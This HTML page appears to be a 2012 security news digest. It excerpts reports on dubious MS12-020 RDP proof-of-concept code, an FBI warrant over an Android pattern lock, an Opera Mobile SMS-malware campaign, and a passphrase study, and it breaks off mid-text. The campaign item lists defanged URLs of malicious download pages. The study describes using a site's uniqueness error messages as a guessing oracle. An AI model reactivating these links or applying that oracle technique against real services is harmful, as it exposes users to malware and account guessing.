<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://pastebin.com/jZt9gmD5"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/jZt9gmD5</span></a></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://pastebin.com/fFWkezQH"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/fFWkezQH</span></a></p>
<p dir="ltr" style="margin-left: 4.5pt;margin-right: 4.5pt;text-indent: -4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.9170.org/post-421.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.9170.org/post-421.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are currently three, possibly more, PoC examples for MS12-020 that are floating around. &nbsp;When you look at these you&rsquo;ll notice first that they were supposedly coded by &lsquo;</span><a href="mailto:sabu@fbi.gov"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">sabu@fbi.gov</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rsquo; and that they require FreeRDP for the code to function. &nbsp;This is not surprising since it&rsquo;s an RDP vulnerability that we&rsquo;re looking to exploit. &nbsp;The problem comes when you try to utilize a python module named freerdp. <br class="kix-line-break" /><br />
	</span></p>
<p dir="ltr" style="margin-left: 36pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">from freerdp import rdpRdp</span></p>
<p dir="ltr" style="margin-left: 36pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">from freerdp import crypto</span></p>
<p dir="ltr" style="margin-left: 36pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">from freerdp.rdpRdp import &nbsp;rdpNego</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It might not surprise you to learn that there is no freerdp module included with FreeRDP, so we reached out to the developers of the FreeRDP project, nice work BTW, to see if they could confirmed the existance of a FreeRDP module for Python. &nbsp;According to FreeRDP developer Marc-Andr&eacute; Moreau, there is no known freerdp python module. &nbsp;There has never been any reason to write one since FreeRDP wouldn&rsquo;t be usable from within Python. &nbsp;Therefore when you combine the fact that this module is required along with the shell code from the MS08-067 exploit, but interestingly a completely different (and significantly larger) payload. &nbsp;There are some undeniable similarity between the PoC and the MS08-067 exploit: </span><a href="http://downloads.securityfocus.com/vulnerabilities/exploits/31874.py"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://downloads.securityfocus.com/vulnerabilities/exploits/31874.py</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &nbsp;Also the &lsquo;payload&rsquo; is strikingly similar to an apache exploit: </span><a href="http://www.chroot.org/exploits/chroot_uu_011"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.chroot.org/exploits/chroot_uu_011</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It has been confirmed that a working PoC has been confirmed to cause a blue screen on a patched to ms11-065 &nbsp;Windows XP SP3. &nbsp;There are currently efforts ongoing to fully understand why the crash is occurring. &nbsp;Determine methods for getting a crash reliably &nbsp;(currently the PoC doesn&#39;t always cause a crash). &nbsp;Craft an open source version of the trigger (instead of this binary rdpclient.exe) and determine a mechanisms for sculpting heap memory to get control</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wired.com/threatlevel/2012/03/fbi-android-phone-lock/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2012/03/fbi-android-phone-lock</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pattern-screen locks on Android phones are secure, apparently so much so that they have stumped the Federal Bureau of Investigation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The bureau claims in federal court documents that forensics experts performed &ldquo;multiple attempts&rdquo; to access the contents of a Samsung Exhibit II handset, but failed to unlock the phone.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Android device requires the handset&rsquo;s Google e-mail address and its accompanying password to unlock the handset once too many wrong swipes are made. The bureau is seeking that information via a court-approved warrant to Google in order to unlock a suspected San Diego-area prostitution pimp&rsquo;s mobile phone</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Locking down a phone is even more important today than ever because smart phones store so much personal information. What&rsquo;s more, &nbsp;many states, including California, grant authorities the right to access a suspect&rsquo;s mobile phone, without a warrant, upon arrest for any crime.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forensic experts and companies in the phone-cracking space agreed that the Android passcode locks can defeat unauthorized intrusions.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s not unreasonable they don&rsquo;t have the capability to bypass that on a live device,&rdquo; said Dan Rosenberg, a consultant at Boston-based Virtual Security Research.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A San Diego federal judge days ago approved the warrant upon a request by FBI Special Agent Jonathan Cupina. The warrant was disclosed Wednesday by security researcher Christopher Soghoian,</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a court filing, Cupina</span><a href="http://www.wired.com/images_blogs/threatlevel/2012/03/gov.uscourts.casd_.378626.1.0.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">wrote</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: (.pdf)</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Failure to gain access to the cellular telephone&rsquo;s memory was caused by an electronic &lsquo;pattern lock&rsquo; programmed into the cellular telephone. A pattern lock is a modern type of password installed on electronic devices, typically cellular telephones. To unlock the device, a user must move a finger or stylus over the keypad touch screen in a precise pattern so as to trigger the previously coded un-locking mechanism. Entering repeated incorrect patterns will cause a lock-out, requiring a Google e-mail login and password to override. Without the Google e-mail login and password, the cellular telephone&rsquo;s memory can not be accessed. Obtaining this information from Google, per the issuance of this search warrant, will allow law enforcement to gain access to the contents of the memory of the cellular telephone in question.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rosenberg, in a telephone interview, suggested the authorities could &ldquo;dismantle a phone and extract data from the physical components inside if you&rsquo;re looking to get access.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, that runs the risk of damaging the phone&rsquo;s innards, and preventing any data recovery.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linda Davis, a spokeswoman for forensics-solutions company Logicube of suburban Los Angeles, said law enforcement is a customer of its CellXtract technology, which it advertises as a means to &ldquo;fast and thorough forensic data extraction from mobile devices.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But that software, she said in a telephone interview, &ldquo;is not going to work&rdquo; on a locked device.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://research.zscaler.com/2012/03/malware-campaign-targeting-opera-mobile.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://research.zscaler.com/2012/03/malware-campaign-targeting-opera-mobile.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New research show that there is active malware targeting Opera Mobile users, to trick them into installing a malware on the device.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The links are in the form of: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">hxxp://geqe.net/opera_mini/1965/opera_mini.auto#phpsessid=85cfe7f19a08b6387d0441a9d949bb95</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Each has a different </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">phpsessid</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> value. The domain was registered last month (02/12/2012) and does not seem to host any legitimate content.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These pages redirect to another domain, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">mskmarkets.ru</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">hxxp://mskmarkets.ru/l.php?l=o4&amp;r=2695&amp;a=29#phpsessid=afe9720a74a56800a2bd682b171e9914</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) where users are warned in Russian that their browser is out of date:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#eeeeee;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">WARNING!</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#eeeeee;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#eeeeee;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An update your browser!</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#eeeeee;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Your browser version is outdated, your phone is at risk of infection by dangerous virus!</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#eeeeee;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We strongly recommend that you upgrade your browser. To update, click Update.</span></p>
<p>
	&nbsp;</p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="624" /></colgroup>
<tbody>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="169px;" src="https://lh4.googleusercontent.com/g59ccNavI_303dLLmHnIMqgRp5oQqMkg_3I5e-_rmUxBGjpHSW240aP5FS9BmJpsv2cTLXQE7cHlUiRao0HBiewOa8haHZBYZEkTdjxdznUv6PLVFRQ" width="533px;" />*</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="text-align: center; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">hxxp://geqe.net/opera_mini/1965/opera_mini.auto#phpsessid=85cfe7f19a08b6387d0441a9d949bb95</span></p>
</td>
</tr>
</tbody>
</table>
</div>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Note that a Google Chrome favicon is used and the page leverages the same theme and icons as</span><a href="http://www.opera.com/mobile/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Opera Mobile</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. The source code has multiple references to Opera (CSS, links, etc.) and targets WAP-enabled devices.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the user clicks on the Refresh button, the file </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">browser_update.jar</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> gets downloaded (and possibly installed, I don&#39;t have the right device to test). This malicious Java application is currently flagged by</span><a href="https://www.virustotal.com/file/c24f498fbe88e23a4fc46c7a74200c14c55a73ec7d52f913f0b8ef3faa14f733/analysis/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">8 of 43 AV engines</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> as an SMS sender. This type of malware is very common on mobile devices. They are used for spam or contact surcharged phone numbers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to</span><a href="http://en.wikipedia.org/wiki/Opera_%28web_browser%29#Market_adoption"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Wikipedia</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Opera has a huge market share in Russia and Eastern Europe, with more than 36% of the browser market (only 2.7% world-wide).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.lightbluetouchpaper.org/2012/03/07/some-evidence-on-multi-word-passphrases/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.lightbluetouchpaper.org/2012/03/07/some-evidence-on-multi-word-passphrases/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Using a multi-word &ldquo;passphrase&rdquo; instead of a password has been suggested for decades as a way to thwart guessing attacks. The idea is now making a comeback, for example with the</span><a href="http://www.fastword.me/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Fastwords</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> proposal which identifies that mobile phones are optimised for entering dictionary words and not random character strings. Google&rsquo;s recent password advice suggests</span><a href="http://www.lightbluetouchpaper.org/2011/11/08/want-to-create-a-really-strong-password-dont-ask-google/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">condensing a sentence to form a password</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, while </span><a href="http://dl.acm.org/citation.cfm?id=1979321"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Komanduri et al.&rsquo;s recent lab study</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> suggests simply requiring longer passwords may be the best security policy. Even</span><a href="http://xkcd.com/936/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">xkcd espouses multi-word passwords</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (albeit with randomly-chosen words). I&rsquo;ve been advocating through my research though that authentication schemes can only be evaluated by studying large user-chosens distribution in the wild and not the theoretical space of choices. There&rsquo;s no public data on how people choose passphrases, though </span><a href="http://dl.acm.org/citation.cfm?id=1143129"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Kuo et al.&rsquo;s 2006 study</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for mnemonic-phrase passwords found many weak choices. In</span><a href="http://www.cl.cam.ac.uk/%7Ejcb82/doc/BS12-USEC-passphrase_linguistics.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">my recent paper</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (written with Ekaterina Shutova)</span><a href="http://www.cl.cam.ac.uk/%7Ejcb82/doc/BS12-USEC-passphrase_linguistics-slides.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">presented</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> at</span><a href="http://infosecon.net/usec12/index.php"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">USEC</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> last Friday (a workshop co-located with Financial Crypto), we study the problem using data crawled from the</span><a href="https://payments.amazon.com/pph/ui/overview"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">now-defunct Amazon PayPhrase</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> system, introduced last year for US users only. Our goal wasn&rsquo;t to evaluate the security of the scheme as deployed by Amazon, but learn more how people choose passphrases in general. While this is a relatively limited data source, our results suggest some caution on this approach.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon&rsquo;s system requires a multi-word (minimum 2) passphrase which is globally unique. This provided an oracle for our experiment: in the original version of the site, error messages would clearly indicate if a phrase was already chosen (as opposed to being blacklisted or invalid), letting us test large lists of phrases to see what was taken. Our first experiment was a dictionary attack using lists of movie titles, sports team names, and dozens of other types of proper nouns crawled from</span><a href="http://en.wikipedia.org/wiki/Main_Page"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Wikipedia</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, along with idiomatic phrases crawled from soruces like</span><a href="http://www.urbandictionary.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span 